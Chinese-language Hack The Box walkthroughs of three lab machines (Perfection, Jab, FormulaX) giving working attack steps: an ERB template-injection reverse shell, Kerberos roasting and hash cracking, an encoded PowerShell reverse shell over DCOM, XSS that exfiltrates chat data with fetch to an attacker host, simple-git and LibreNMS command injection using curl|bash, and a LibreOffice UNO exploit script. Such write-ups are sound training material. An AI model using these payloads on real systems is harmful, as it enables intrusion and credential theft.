Perfection
渗透
这里直接用kali连上去,kali上自带OpenVPN,看看网卡
tun0: flags=4305<UP,POINTOPOINT,RUNNING,NOARP,MULTICAST> mtu 1500
inet 10.10.14.46 netmask 255.255.254.0 destination 10.10.14.46
inet6 fe80::fa02:de55:efc4:c711 prefixlen 64 scopeid 0x20<link>
inet6 dead:beef:2::102c prefixlen 64 scopeid 0x0<global>
unspec 00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00 txqueuelen 500 (UNSPEC)
RX packets 0 bytes 0 (0.0 B)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 4 bytes 192 (192.0 B)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
发现多了一块,那就没问题了,开了机器之后直接fscan扫一下
/fscan_amd64 -h 10.10.11.253
有两个端口开放了,一个是80,一个是22,访问80端口,发现一个计算成绩的网站
那重点应该就是看看这些框框了,一般都是命令执行之类的,因为不清楚是什么语言,不知道怎么执行,看了看wp,是直接弹shell,
grade1=1&weight1=100&category2=N%2FA&grade2=1&weight2=0&category3=N%2FA&grade3=1&weight3=0&category4=N%2FA&grade4=1&weight4=0&category5=N%2FA&grade5=1&weight5=0&category1=a%0A<%25%3dsystem("echo+YmFzaCAtaSA%2BJiAvZGV2L3RjcC8xMC4xMC4xNC40Ni84ODg4IDA%2BJjE%3D|+base64+-d+|+bash");%25>13E1
看起来像是php的,但其实是Ruby on Rails框架中的ERB(Embedded Ruby)模板语言
拿到shell之后找找第一个flag
susan@perfection:~$ cat user.txt
cat user.txt
e5396bb500041ca550313d9ea1c81a9c
提权
先看看SUID提权
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/bin/chfn
/usr/bin/fusermount3
/usr/bin/umount
/usr/bin/sudo
/usr/bin/chsh
/usr/bin/newgrp
/usr/bin/passwd
/usr/bin/mount
/usr/bin/gpasswd
/usr/bin/su
/usr/libexec/polkit-agent-helper-1
没发现有什么很显眼的东西,会想起刚才找到flag文件的位置有一个Migration
susan@perfection:~/ruby_app$ cd ~
cd ~
susan@perfection:~$ ls
ls
linpeas.sh
Migration
ruby_app
user.txt
susan@perfection:~$ cd Migration
cd Migration
susan@perfection:~/Migration$ ls
ls
pupilpath_credentials.db
进去之后有一个db文件,传出去看看
password应该是hash,看看mail
susan@perfection:~/ruby_app$ cd /var/mail
cd /var/mail
susan@perfection:/var/mail$ ls
ls
susan
cat susan
Due to our transition to Jupiter Grades because of the PupilPath data breach, I thought we should also migrate our credentials ('our' including the other students
in our class) to the new platform. I also suggest a new password specification, to make things easier for everyone. The password format is:
{firstname}_{firstname backwards}_{randomly generated integer between 1 and 1,000,000,000}
Note that all letters of the first name should be convered into lowercase.
Please hit me with updates on the migration when you can. I am currently registering our university with the platform.
- Tina, your delightful student
大致的意思就是数据泄露,让所有人都改密码,密码的格式固定为{firstname}{firstname backwards}{randomly generated integer between 1 and 1,000,000,000},用Hashcat爆破一下
hashcat -m 1400 susan.hash -a 3 susan_nasus_?d?d?d?d?d?d?d?d?d
abeb6f8eb5722b8ca3b45f6f72a0cf17c7028d62a15a30199347d9d74f39023f:susan_nasus_413759210
然后ssh登录上去就行了
susan@perfection:~$ sudo -l
[sudo] password for susan:
Matching Defaults entries for susan on perfection:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin,
use_pty
User susan may run the following commands on perfection:
(ALL : ALL) ALL
第二个flag就在root.txt里
关于Hashcat的使用可以看这篇文章https://xz.aliyun.com/t/4008?time__1311=n4%2BxnD0DyGYQqY5i%3DDCDlhjeKeboeDRiEYxoD&alichlgref=https%3A%2F%2Fwww.google.com%2F
Jab
User权限
先用nmap扫描一下
nmap 10.10.11.4 --min-rate 10000
PORT STATE SERVICE
53/tcp open domain
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
5222/tcp open xmpp-client
5269/tcp open xmpp-server
7070/tcp open realserver
7443/tcp open oracleas-https
7777/tcp open cbt
看到445,139端口,第一反应是smb服务,再详细扫一下
nmap -A 10.10.11.4 -oA
东西挺多的,很多没啥用,贴出有用信息的部分
Network Distance: 2 hops
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
| smb2-time:
| date: 2024-03-10T05:09:17
|_ start_date: N/A
TRACEROUTE (using port 80/tcp)
HOP RTT ADDRESS
1 400.22 ms 10.10.14.1
2 418.95 ms 10.10.11.4
Windows机器,是一台域控,没有开放的Web服务,域名jab.htb,用nmap探测一下有没有smb漏洞
nmap -p445 --script smb-vuln* 10.10.11.4
PORT STATE SERVICE
445/tcp open microsoft-ds
Host script results:
|_smb-vuln-ms10-061: Could not negotiate a connection:SMB: Failed to receive bytes: ERROR
|_smb-vuln-ms10-054: false
pidgin
jabber和xmpp是聊天服务,通过pidgin可以连接到服务中
sudo apt install pidgin
安装之后在终端直接运行pidgin就会出现图形化界面,然后添加用户
还要在Advanced配置好服务器地址(jab.htb的ip)
然后会出现XMPP Client Registration,在上面填好自己刚才的账号密码,再看到Buddy List窗口,点击 Join a Chat->and click on “Room List”->Find Rooms
点一下就可以进入聊天了,但是进去之后发现只有我一人在线,并没有其他有用的信息。
Pidgin有一个功能可以查找域上的用户,那么我们就找一找jab.htb上的用户。返回Buddy List,点击Accounts,点击你创建的用户,点击Search for Users,会弹出一个窗口,点击Search Directory就会弹出搜索窗口了,
搜索完成之后会有很多账号,为了导出账号,我们重开一次,这次我们讲记录日志
sudo pidgin -d > output.log
然后用正则匹配用户名
grep -oP '<value>\K[^<]+@jab.htb(?=</value>)' output.log | sed 's/@jab.htb//g' | sort | uniq > outputfiltered.lst
成功拿下用户名
Kerbrute
还有一种获取用户名的办法是直接爆破,这里用Kerbrute来爆破AD用户,这里用的userenum模式,要先找一个字典,这个项目有点大,就下这里需要的部分就好了
./kerbrute_linux_amd64 userenum --dc 10.10.11.4 -d jab.htb -t 1000 xato-net-10-million-usernames.txt
我是直接下载的执行文件,他不会把结果输出到文件里面,只能自己复制,然后写个脚本匹配用户名
import re
# 打开文件
with open("data.txt", "r") as file:
# 逐行读取文件内容
for line in file:
# 定义匹配模式
pattern = r'VALID USERNAME:\s+(\w+)@'
# 使用正则表达式进行匹配
match = re.search(pattern, line)
# 如果找到匹配项,则输出用户名
if match:
username = match.group(1)
print("用户名:", username)
但是爆破的效果肯定适合字典有关,而且连的国外的机子,跑起来很慢
AS-REP Roasting攻击
AS-REP Roasting攻击要求用户开启了“不使用Kerberos预认证”,如果存在这样的用户我们就可以获取到此用户的hash值,然后离线爆破
python GetNPUsers.py jab.htb/ -usersfile /home/kali/Desktop/outputfiltered.lst -format hashcat -outputfile jabhashes.txt
如果出现了Errno Connection error ; Name or service not known报错,跑一下这个命令
echo "10.10.11.4 jab.htb" | sudo tee -a /etc/hosts
建议吃饭的之后跑,我花了一个多小时才跑完,跑完发现三个用户是开了不使用预认证的
跑完之后就用hashcat或者john离线爆破一下
## John
john -w=/usr/share/wordlists/rockyou.txt jabhashes.txt
## Hashcat
hashcat jabhashes.txt /usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 3 password hashes with 3 different salts (krb5asrep, Kerberos 5 AS-REP etype 17/18/23 [MD4 HMAC-MD5 RC4 / PBKDF2 HMAC-SHA1 AES 256/256 AVX2 8x])
Will run 8 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
Midnight_121 ($krb5asrep$23$jmontgomery@JAB.HTB)
1g 0:00:00:14 DONE (2024-03-10 06:54) 0.07017g/s 1006Kp/s 2772Kc/s 2772KC/s !)(OPPQR..*7¡Vamos!
三个账号跑出来了一个,用这个账号登录一下,还是刚才的流程
大致翻译一下他们的对话
A:我们需要完成上季度渗透测试的修复后测试。 @bdavis Brian 您能给我们提供一下状态吗?
B:当然。我们从 svc_openfire 帐户中删除了 SPN。我相信这是发现#2。安全团队的人可以测试一下吗?如果没有,我们可以将其发送回渗透测试人员进行验证。
B:以下是报告中的命令,您能找到安全团队中可以重新运行这些命令进行验证的人员吗?
B:GetUserSPNs.py -request -dc-ip 192.168.195.129 jab.htb/hthompson
B:hashcat -m 13100 svc_openfire_tgs /usr/share/wordlists/rockyou.txt
第二条命令直接就把密码爆出来了,就在:后面
!@#$%^&*(1qazxsw
impacket远程访问
135端口运行了MSRPC服务,539端口运行了RPC服务,那也肯定运行了DCOM(分布式组件对象模型(DCOM)远程协议是一种通过远程调用(RPC)公开应用程序对象的协议)
impacket 工具“dcomexec.py”可用于远程访问 svc_openfire
## Example
dcomexec.pey -object <DCOM Object> <domain>/<account>:'<password>'@<target IP> 'Command & payload' -silentcommand
## Actual Command
dcomexec.py -object MMC20 jab.htb/svc_openfire:'!@#$%^&*(1qazxsw'@10.10.11.4 'cmd.exe /c powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAwAC4AMQA0AC4ANQA1ACIALAA4ADgAOAA4ACkAOwAkAHMAdAByAGUAYQBtACAAPQAgACQAYwBsAGkAZQBuAHQALgBHAGUAdABTAHQAcgBlAGEAbQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AJABiAHkAdABlAHMAIAA9ACAAMAAuAC4ANgA1ADUAMwA1AHwAJQB7ADAAfQA7AHcAaABpAGwAZQAoACgAJABpACAAPQAgACQAcwB0AHIAZQBhAG0ALgBSAGUAYQBkACgAJABiAHkAdABlAHMALAAgADAALAAgACQAYgB5AHQAZQBzAC4ATABlAG4AZwB0AGgAKQApACAALQBuAGUAIAAwACkAewA7ACQAZABhAHQAYQAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAFQAeQBwAGUATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEEAUwBDAEkASQBFAG4AYwBvAGQAaQBuAGcAKQAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABiAHkAdABlAHMALAAwACwAIAAkAGkAKQA7ACQAcwBlAG4AZABiAGEAYwBrACAAPQAgACgAaQBlAHgAIAAkAGQAYQB0AGEAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcAIAApADsAJABzAGUAbgBkAGIAYQBjAGsAMgAgAD0AIAAkAHMAZQBuAGQAYgBhAGMAawAgACsAIAAiAFAAUwAgACIAIAArACAAKABwAHcAZAApAC4AUABhAHQAaAAgACsAIAAiAD4AIAAiADsAJABzAGUAbgBkAGIAeQB0AGUAIAA9ACAAKABbAHQAZQB4AHQALgBlAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkALgBHAGUAdABCAHkAdABlAHMAKAAkAHMAZQBuAGQAYgBhAGMAawAyACkAOwAkAHMAdAByAGUAYQBtAC4AVwByAGkAdABlACgAJABzAGUAbgBkAGIAeQB0AGUALAAwACwAJABzAGUAbgBkAGIAeQB0AGUALgBMAGUAbgBnAHQAaAApADsAJABzAHQAcgBlAGEAbQAuAEYAbAB1AHMAaAAoACkAfQA7ACQAYwBsAGkAZQBuAHQALgBDAGwAbwBzAGUAKAApAA==' -silentcommand
这里的payload可以用这个网站生成
payload打出去之后要等一小会儿才会有回显,出现了connect to [your_ip] from (UNKNOWN) [10.10.11.4] 59624之后按一下enter就会有shell了
第一个flag就在C:\Users\svc_openfire\Desktop
Root权限
信息收集
查看开放的端口以及服务
netstat-ano
查看进程
ps
1309 121 650564 598892 600 0 openfire-service
103 7 1316 5072 2728 0 openfire-service
发现运行了openfire服务
openfire-service存在后台绕过漏洞,他的web端口一般在9090或者9091
端口转发
现在就要想办法把这台机子的9090端口和9091端口转发给kali攻击机,这里使用Chisel端口转发,但是要先下载一个Chisel.exe才行
我们可以利用certutil.exe 这个工具,他就类似于curl和wget,在kali上用python起一个8001服务,然后返回C:\windows\system32目录下执行
certutil.exe -urlcache -f http://10.10.16.12:8001/chisel.exe chisel.exe
下载好之后在C:\Users\svc_openfire\Downloads运行
./chisel.exe client 10.10.15.55:8050 R:9090:127.0.0.1:9090 R:9091:127.0.0.1:9091
就可以在本地访问openfire-service服务了
CVE-2023-32315
用svc_openfire登录一下,然后就登录到了管理员界面
然后用github上的项目在后台上传插件,插件在release中,上传插件之后转到Server->Server Settings->Management Tool然后输入管理员密码,密码在上传完插件之后会显示
FormulaX
信息收集
先用nmap扫一扫再说
nmap -sV -sC -Pn -T4 10.10.11.6
Starting Nmap 7.94 ( https://nmap.org ) at 2024-03-15 21:30 EDT
Nmap scan report for nunchucks.htb (10.10.11.6)
Host is up (0.40s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.6 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 5f:b2:cd:54:e4:47:d1:0e:9e:81:35:92:3c:d6:a3:cb (ECDSA)
|_ 256 b9:f0:0d:dc:05:7b:fa:fb:91:e6:d0:b4:59:e6:db:88 (ED25519)
80/tcp open http nginx 1.18.0 (Ubuntu)
|_http-cors: GET POST
| http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_Requested resource was /static/index.html
|_http-server-header: nginx/1.18.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 64.51 seconds
开放了两个端口,还扫出了他的域名nunchucks.htb,先把他添加到hosts中再访问
先创建一个账号,再登录进去看看
里面有一个聊天机器人,它提示我们用help查看命令,help之后告诉我们history可以查看历史命令,抓包看看
分析数据包发现,他用的是JS的socket.io通信框架,请求来自/restricted/chat.html,在调试器里面看看源码
let value;
const res = axios.get(`/user/api/chat`);
const socket = io('/',{withCredentials: true});
//listening for the messages
socket.on('message', (my_message) => {
//console.log("Received From Server: " + my_message)
Show_messages_on_screen_of_Server(my_message)
})
const typing_chat = () => {
value = document.getElementById('user_message').value
if (value) {
// sending the messages to the server
socket.emit('client_message', value)
Show_messages_on_screen_of_Client(value);
// here we will do out socket things..
document.getElementById('user_message').value = ""
}
else {
alert("Cannot send Empty Messages");
}
}
function htmlEncode(str) {
return String(str).replace(/[^\w. ]/gi, function (c) {
return '&#' + c.charCodeAt(0) + ';';
});
}
const Show_messages_on_screen_of_Server = (value) => {
const div = document.createElement('div');
div.classList.add('container')
div.innerHTML = `
<h2>🤖 </h2>
<p>${value}</p>
`
document.getElementById('big_container').appendChild(div)
}
// send the input to the chat forum
const Show_messages_on_screen_of_Client = (value) => {
value = htmlEncode(value)
const div = document.createElement('div');
div.classList.add('container')
div.classList.add('darker')
div.innerHTML = `
<h2>🤖 </h2>
<p>${value}</p>
`
document.getElementById('big_container').appendChild(div)
}
XSS
分析上面的代码,Show_messages_on_screen_of_Server是直接将用户的输入插入到HTML中,没有经过过滤,那这里就很容易产生XSS,测试一下
先起一个php服务
php -S 0.0.0.0:1234
payload
<img src=x onerror="document.location='http://10.10.14.12:1234/'"/>
可以看到确实存在XSS漏洞,先在攻击机上起两个服务
php -S 0.0.0.0:8000
php -S 0.0.0.0:4444
在8000服务下面编辑payload.js
const script = document.createElement('script');
script.src = '/socket.io/socket.io.js';
document.head.appendChild(script);
script.addEventListener('load', function() {
const res = axios.get(`/user/api/chat`);
const socket = io('/',{withCredentials: true});
socket.on('message', (my_message) => {
fetch("http://10.10.14.12:4444/?d=" + btoa(my_message))
});
socket.emit('client_message', 'history');
});
然后在漏洞点用下面的payload打过去
<img src=x onerror="var script1=document.createElement('script');script1.src='http://10.10.14.12:8000/payload.js';document.head.appendChild(script1);"/>
给了很多base64编码的信息,解码一下,发现给了我们一个子域名dev-git-auto-update.chatbot.htb,把他加入hosts,然后访问
这里有个小bug,如果你开了Burp发现访问不了,报错No response received from remote server, 有两种解决方法,一是直接关掉Burp,第二种方法可以看这里https://www.cnblogs.com/k1115h0t/p/17601709.html
CVE-2022-25912
注意到下面的CMS版本是simple-git v3.14,搜一搜相关的漏洞,发现了CVE-2022-25912
POC
const simpleGit = require('simple-git')
const git2 = simpleGit()
git2.clone('ext::sh -c touch% /tmp/pwn% >&2', '/tmp/example-new-repo', ["-c", "protocol.ext.allow=always"]);
直接反弹shell是不行的,这里用CURL配合反弹shell,还要开一个8001服务
exp
bash -i >& /dev/tcp/10.10.14.12/8888 0>&1
payload
ext::sh -c curl% http://10.10.14.12:8001/exp|bash >&2
rlwrap nc -lvvp 8888
提权
拿到shell之后先看看权限,一般都是www-data权限
whoami
查看用户
cat /etc/passwd | grep bash
root:x:0:0:root:/root:/bin/bash
librenms:x:999:999::/opt/librenms:/usr/bin/bash
kai_relay:x:1001:1001:Kai Relay,,,:/home/kai_relay:/bin/bash
frank_dorky:x:1002:1002:,,,:/home/frank_dorky:/bin/bash
再看看正在运行的服务
systemctl list-units --type=service --state=running
发现运行了一个MongoDB
查看配置文件
cat con*
import mongoose from "mongoose";
const connectDB= async(URL_DATABASE)=>{
try{
const DB_OPTIONS={
dbName : "testing"
}
mongoose.connect(URL_DATABASE,DB_OPTIONS)
console.log("Connected Successfully TO Database")
}catch(error){
console.log(`Error Connecting to the ERROR ${error}`);
}
}
查看系统上所有的网络连接,监听端口,进程
netstat -tunpl
netstat -tunpl
(Not all processes could be identified, non-owned process info
will not be shown, you would have to be root to see it all.)
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 127.0.0.1:43313 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:27017 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:80 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:3000 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:44489 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.53:53 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:3306 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:8000 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:2002 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:8082 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:8081 0.0.0.0:* LISTEN -
tcp6 0 0 :::22 :::* LISTEN -
udp 0 0 127.0.0.53:53 0.0.0.0:* -
udp 0 0 0.0.0.0:68 0.0.0.0:* -
udp 0 0 0.0.0.0:162 0.0.0.0:* -
udp6 0 0 :::162 :::* -
发现27017端口开着的,直接进Mongo拿数据
mongo
MongoDB shell version v4.4.29
connecting to: mongodb://127.0.0.1:27017/?compressors=disabled&gssapiServiceName=mongodb
Implicit session: session { "id" : UUID("2eaace3b-54ab-41a8-852b-7be3921d95fb") }
MongoDB server version: 4.4.8
show databases
admin 0.000GB
config 0.000GB
local 0.000GB
testing 0.000GB
use testing
switched to db testing
show tables
messages
users
db.users.find()
{ "_id" : ObjectId("648874de313b8717284f457c"), "name" : "admin", "email" : "admin@chatbot.htb", "password" : "$2b$10$VSrvhM/5YGM0uyCeEYf/TuvJzzTz.jDLVJ2QqtumdDoKGSa.6aIC.", "terms" : true, "value" : true, "authorization_token" : "Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VySUQiOiI2NDg4NzRkZTMxM2I4NzE3Mjg0ZjQ1N2MiLCJpYXQiOjE3MTA1NjM0NDN9.xKQVFrHjQ0MyakG2QBXWduuRD9WPQfYUDnqgrChaZ0U", "__v" : 0 }
{ "_id" : ObjectId("648874de313b8717284f457d"), "name" : "frank_dorky", "email" : "frank_dorky@chatbot.htb", "password" : "$2b$10$hrB/by.tb/4ABJbbt1l4/ep/L4CTY6391eSETamjLp7s.elpsB4J6", "terms" : true, "value" : true, "authorization_token" : " ", "__v" : 0 }
拿到两组登录凭证
admin::$2b$10$VSrvhM/5YGM0uyCeEYf/TuvJzzTz.jDLVJ2QqtumdDoKGSa.6aIC.
frank_dorky:$2b$10$hrB/by.tb/4ABJbbt1l4/ep/L4CTY6391eSETamjLp7s.elpsB4J6
用john爆破一下密码
john -w=/usr/share/wordlists/rockyou.txt frank
Using default input encoding: UTF-8
Loaded 1 password hash (bcrypt [Blowfish 32/64 X3])
Cost 1 (iteration count) is 1024 for all loaded hashes
Will run 8 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
manchesterunited (?)
1g 0:00:00:10 DONE (2024-03-16 00:57) 0.09633g/s 270.5p/s 270.5c/s 270.5C/s onlyme..keyboard
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
su切换用户
su frank_dorky
然后在家目录下找到第一个flag
横向移动
除了27017端口外,还有一个3000端口是开着的,直接用ssh把端口转发出来
ssh -L 3000:127.0.0.0.1:3000 frank_dorky@10.10.11.6
Password: manchesterunited
LibreNMS 是一种基于 PHP/MySQL/SNMP 的自动发现网络监控工具,支持多种网络硬件和操作系统,包括 Cisco、Linux、FreeBSD、Juniper、Brocade、Foundry、HP 等。
可以直接用frank_dorky登录上去,但是里面什么都没有,admin用户我们又没办法破解他的hash,想要获取到LibreNMS的更高权限就只能从他本身入手
第一步,找到LibreNMS在服务器中的位置
find / -name librenms 2>/dev/null
/var/lib/mysql/librenms
/etc/logrotate.d/librenms
/opt/librenms
进入/opt/librenms,但是我们没又列出文件的权限
第二步,利用LibreNMS添加管理员
LiBreNMS添加管理员只需要我们对于adduser.php有可执行权限,
ls -l adduser.php
-rwxr-xr-x 1 librenms librenms 956 Oct 18 2022 adduser.php
我们确实是有可执行权限的
./adduser.php yuyulin yuyulin 10
进去之后找到templates,然后创建一个新的templates,在里面可以写入php代码
@php system("id>/tmp/yuyulin");@endphp
但是发现点了没反应,这是因为我们的域名配置有问题,在访问librenms.com的时候会无法解析,把他添加到hosts中就好了,然后以librenms.com访问
cat /tmp/yuyulin
uid=999(librenms) gid=999(librenms) groups=999(librenms)
发现成功执行
然后继续用curl反弹shell出来
@php system("curl http://10.10.14.12:8001/exp|bash >&2");@endphp
在环境变量中找到了kai_relay用户的password
kai_relay的password不止是数据库的密码,同样可以ssh登录上去
kai_relay
mychemicalformulaX
上面提到了一个sh文件,看看里面的内容
cat /usr/bin/office.sh
#!/bin/bash
/usr/bin/soffice --calc --accept="socket,host=localhost,port=2002;urp;" --norestore --nologo --nodefault --headless
这段脚本是用来启动 LibreOffice Calc 以便它能够通过端口2002在localhost接受UNO(Universal Network Objects)远程调用的
相关的RCE
首先在/tmp目录下创建一个shell.sh文件,内容为
curl http://10.10.14.12:8001/exp|bash
exp里面的内容就是反弹shell的命令
/bin/bash -i >& /dev/tcp/10.10.14.12/4444 0>&1
攻击机开启8001服务,里面放上我们的exp.py
import uno
from com.sun.star.system import XSystemShellExecute
import argparse
parser = argparse.ArgumentParser()
parser.add_argument('--host', help='host to connect to', dest='host', required=True)
parser.add_argument('--port', help='port to connect to', dest='port', required=True)
args = parser.parse_args()
# Define the UNO component
localContext = uno.getComponentContext()
# Define the resolver to use, this is used to connect with the API
resolver = localContext.ServiceManager.createInstanceWithContext(
"com.sun.star.bridge.UnoUrlResolver", localContext )
# Connect with the provided host on the provided target port
print("[+] Connecting to target...")
context = resolver.resolve(
"uno:socket,host={0},port={1};urp;StarOffice.ComponentContext".format(args.host,args.port))
# Issue the service manager to spawn the SystemShellExecute module and execute calc.exe
service_manager = context.ServiceManager
print("[+] Connected to {0}".format(args.host))
shell_execute = service_manager.createInstance("com.sun.star.system.SystemShellExecute")
shell_execute.execute("/tmp/shell.sh", '',1)
如果你创建的sh名字是其他的,把最后一行改掉即可
先从kali上把exp.py下到靶机上
curl -O http://10.10.14.12:8001/exp.py
然后运行
python3 exp.py --host localhost --port 2002
kali上开启监听即可